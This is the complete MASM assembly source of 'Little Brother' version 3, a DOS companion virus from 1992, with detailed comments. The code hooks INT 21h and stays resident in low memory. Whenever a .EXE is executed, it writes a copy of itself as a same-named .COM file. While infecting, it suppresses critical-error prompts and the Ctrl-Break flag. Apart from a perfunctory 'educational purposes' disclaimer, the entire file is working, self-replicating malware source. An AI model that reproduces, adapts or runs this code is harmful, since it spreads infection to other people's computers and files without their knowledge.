Assembly Source File  |  1992-10-11  |  8.2 KB  |  257 lines

  1. ;****************************************************************************
  2. ;*  Little Brother    version 3
  3. ;*
  4. ;*  Compile with MASM 4.0
  5. ;*  (other assemblers will probably not produce the same result)
  6. ;*
  7. ;*  Disclaimer:
  8. ;*  This file is only for educational purposes. The author takes no
  9. ;*  responsibility for anything anyone does with this file. Do not
  10. ;*  modify this file!
  11. ;****************************************************************************
  12.  
  13. cseg            segment
  14.                 assume  cs:cseg,ds:cseg,es:nothing
  15.  
  16.                 .RADIX  16                      ;unsuffixed numeric literals below are hexadecimal
  17.  
  18. FILELEN         equ     end - begin             ;size in bytes of the image between 'begin' and 'end'
  19. oi21            equ     end                     ;dword just past the image: saved original INT 21h vector
  20. nameptr         equ     end+4                   ;dword after oi21: far pointer to the filename being handled
  21.  
  22.  
  23. ;****************************************************************************
  24. ;*              Install the program: copy the image to 0044:0100, hook INT 21h, then run the same-named .EXE
  25. ;****************************************************************************
  26.  
  27.                 org     100h                    ;.COM layout: code starts at offset 100h
  28.  
  29. begin:          cld
  30.                 mov     sp,300                  ;stack top at offset 300h, inside the 30h paragraphs kept below
  31.  
  32.                 mov     ax,0044h                ;move program to empty hole
  33.                 mov     es,ax
  34.                 mov     di,0100h                ;destination 0044:0100 (linear 00540h)
  35.                 mov     si,di                   ;source DS:0100, the running copy
  36.                 mov     cx,FILELEN
  37.         rep     movsb
  38.  
  39.                 mov     ds,cx                   ;get original int21 vector (CX is 0 after the copy, so DS = 0000)
  40.                 mov     si,0084h                ;0000:0084 = vector table entry for INT 21h (21h*4)
  41.                 mov     di,offset oi21
  42.                 mov     dx,offset ni21
  43.                 lodsw                           ;AX = offset part of the current handler
  44.                 cmp     ax,dx                   ;already installed? (only the offset is compared)
  45.                 je      cancel
  46.                 stosw                           ;save old offset in the copy's oi21
  47.                 movsw                           ;save old segment in oi21+2
  48.  
  49.                 push    es                      ;set vector to new handler
  50.                 pop     ds
  51.                 mov     ax,2521h                ;AH=25h AL=21h: INT 21h vector := DS:DX = 0044:ni21
  52.                 int     21h
  53.  
  54. cancel:         push    cs                      ;restore segment registers
  55.                 pop     ds
  56.                 push    cs
  57.                 pop     es
  58.  
  59.                 mov     bx,30                   ;free memory: shrink this program's block to 30h paragraphs
  60.                 mov     ah,4A
  61.                 int     21
  62.  
  63.                 mov     es,ds:[002C]            ;search filename in environment (PSP:002C = environment segment)
  64.                 mov     di,0
  65.                 mov     ch,0FFh
  66.                 mov     al,01                   ;scan for a 01 byte; presumably the count word that precedes the program path
  67.         repnz   scasb
  68.                 inc     di                      ;skip one more byte; ES:DI is saved below as the filename pointer
  69.  
  70.                 mov     word ptr [nameptr],di
  71.                 mov     word ptr [nameptr+2],es
  72.                 
  73.                 mov     si,offset EXE_txt       ;change extension to .EXE
  74.                 call    change_ext
  75.  
  76.                 push    cs
  77.                 pop     es
  78.                 mov     bx,offset param         ;make EXEC param. block
  79.                 mov     [bx+4],cs               ;fill the three segment words left as '?' in param
  80.                 mov     [bx+8],cs
  81.                 mov     [bx+0C],cs
  82.                 lds     dx,dword ptr [nameptr]  ;DS:DX = path with the extension now set to EXE
  83.                 mov     ax,4B00                 ;execute .EXE program
  84.                 int     21
  85.                 mov     ah,4Dh                  ;ask return code
  86.                 int     21
  87.                 mov     ah,4Ch                  ;exit with same return code
  88.                 int     21
  89.  
  90.  
  91. ;****************************************************************************
  92. ;*              EXEC parameter block
  93. ;****************************************************************************
  94.  
  95. param           dw      0, 80, ?, 5C, ?, 6C, ?  ;word 0 = 0; offsets 80h, 5Ch, 6Ch are each followed by a segment word written at run time
  96.  
  97.  
  98. ;****************************************************************************
  99. ;*              File-extensions
  100. ;****************************************************************************
  101.  
  102. EXE_txt         db      'EXE',0                 ;4 bytes: compared against the extension and copied over it by change_ext
  103. COM_txt         db      'COM',0                 ;4 bytes: extension given to the file that infect creates
  104.  
  105.  
  106. ;****************************************************************************
  107. ;*              Interrupt handler 24 (installed only while infect runs): always answers AL=03
  108. ;****************************************************************************
  109.  
  110. ni24:           mov     al,03                   ;fixed response code, so no critical-error prompt reaches the user
  111.                 iret
  112.  
  113.  
  114. ;****************************************************************************
  115. ;*              Interrupt handler 21: on EXEC (AX=4B00h) call infect, then chain to the old handler
  116. ;****************************************************************************
  117.  
  118. ni21:           pushf                           ;save flags and the registers pushed below
  119.                 push    dx
  120.                 push    bx
  121.                 push    ax
  122.                 push    ds
  123.                 push    es
  124.  
  125.                 cmp     ax,4B00h                ;execute ?
  126.                 jne     exit                    ;every other INT 21h request passes straight through
  127.  
  128. doit:           call    infect                  ;DS:DX still points at the name of the program being executed
  129.  
  130. exit:           pop     es                      ;restore in reverse order of the pushes above
  131.                 pop     ds
  132.                 pop     ax
  133.                 pop     bx
  134.                 pop     dx
  135.                 popf
  136.  
  137.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler (far jump through the saved vector)
  138.  
  139.  
  140. ;****************************************************************************
  141. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX): for NAME.EXE a new NAME.COM holding this image is created
  142. ;****************************************************************************
  143.  
  144. infect:         cld
  145.  
  146.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  147.                 mov     word ptr cs:[nameptr+2],ds
  148.  
  149.                 push    cs
  150.                 pop     ds
  151.                 call    searchpoint             ;ES:DI = first character of the extension
  152.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  153.                 mov     cx,3
  154.         rep     cmpsb                           ;byte-for-byte compare with upper-case 'EXE'
  155.                 jnz     return                  ;anything else is left alone
  156.  
  157.                 mov     si,offset COM_txt       ;change extension to COM (rewritten in the caller's own name buffer)
  158.                 call    change_ext
  159.  
  160.                 mov     ax,3300h                ;get ctrl-break flag
  161.                 int     21
  162.                 push    dx                      ;saved for the restore at return1
  163.  
  164.                 cwd                             ;clear the flag (AX=3300h is non-negative, so DX becomes 0)
  165.                 inc     ax                      ;AX = 3301h: set ctrl-break flag from DL
  166.                 push    ax                      ;the same request word is reused for the restore
  167.                 int     21
  168.  
  169.                 mov     ax,3524h                ;get int24 vector
  170.                 int     21
  171.                 push    bx                      ;old INT 24h offset
  172.                 push    es                      ;old INT 24h segment
  173.  
  174.                 push    cs                      ;set int24 vec to new handler
  175.                 pop     ds
  176.                 mov     dx,offset ni24
  177.                 mov     ah,25h                  ;relies on AL still holding 24h from the request above
  178.                 push    ax                      ;the same request word is reused for the restore
  179.                 int     21
  180.  
  181.                 lds     dx,dword ptr [nameptr]  ;create the virus (unique name)
  182.                 xor     cx,cx                   ;CX = 0: no file attributes set
  183.                 mov     ah,5Bh                  ;create-new-file request; carry set means no file was created
  184.                 int     21
  185.                 jc      return1                 
  186.                 xchg    bx,ax                   ;save handle
  187.  
  188.                 push    cs
  189.                 pop     ds
  190.                 mov     cx,FILELEN              ;write the virus
  191.                 mov     dx,offset begin         ;source is the copy in this segment, FILELEN bytes from 'begin'
  192.                 mov     ah,40h
  193.                 int     21
  194.                 cmp     ax,cx                   ;bytes written vs bytes requested
  195.                 pushf                           ;keep the comparison result across the close call
  196.  
  197.                 mov     ah,3Eh                  ;close the file
  198.                 int     21
  199.  
  200.                 popf
  201.                 jz      return1                 ;all bytes written?
  202.  
  203.                 lds     dx,dword ptr [nameptr]  ;no, delete the virus
  204.                 mov     ah,41h
  205.                 int     21
  206.  
  207. return1:        pop     ax                      ;restore int24 vector
  208.                 pop     ds                      ;old segment (pushed from ES above)
  209.                 pop     dx                      ;old offset (pushed from BX above)
  210.                 int     21
  211.  
  212.                 pop     ax                      ;restore ctrl-break flag
  213.                 pop     dx                      ;DL = flag value read at entry
  214.                 int     21
  215.  
  216.                 mov     si,offset EXE_txt       ;change extension to EXE
  217.                 call    change_ext              ;execute .EXE program
  218.  
  219. return:         ret
  220.  
  221.  
  222. ;****************************************************************************
  223. ;*              change the extension of the filename (CS:SI -> ext); the name at nameptr is rewritten in place
  224. ;****************************************************************************
  225.  
  226. change_ext:     call    searchpoint             ;ES:DI = first character of the current extension
  227.                 push    cs
  228.                 pop     ds                      ;DS = CS so that DS:SI addresses EXE_txt / COM_txt
  229.                 movsw                           ;two word moves copy 4 bytes: three letters and the 0
  230.                 movsw
  231.                 ret
  232.  
  233.  
  234. ;****************************************************************************
  235. ;*              search begin of extension (returns ES:DI; assumes the name ends in a 3-character extension)
  236. ;****************************************************************************
  237.  
  238. searchpoint:    les     di,dword ptr cs:[nameptr]  ;ES:DI = saved filename pointer
  239.                 mov     ch,0FFh                 ;scan limit of at least FF00h bytes (CL is left as it was)
  240.                 mov     al,0
  241.         repnz   scasb                           ;stops with DI one past the terminating 0
  242.                 sub     di,4                    ;back over the 0 and three extension characters
  243.                 ret
  244.  
  245.  
  246. ;****************************************************************************
  247. ;*              Text and Signature
  248. ;****************************************************************************
  249.  
  250.                 db      'Little Brother',0      ;plain-text string inside the FILELEN bytes, so present in every written copy
  251.  
  252. end:                                            ;end of the image; oi21 and nameptr are addressed just past this label
  253.  
  254. cseg            ends
  255.                 end     begin                   ;entry point is 'begin'
  256.  
  257.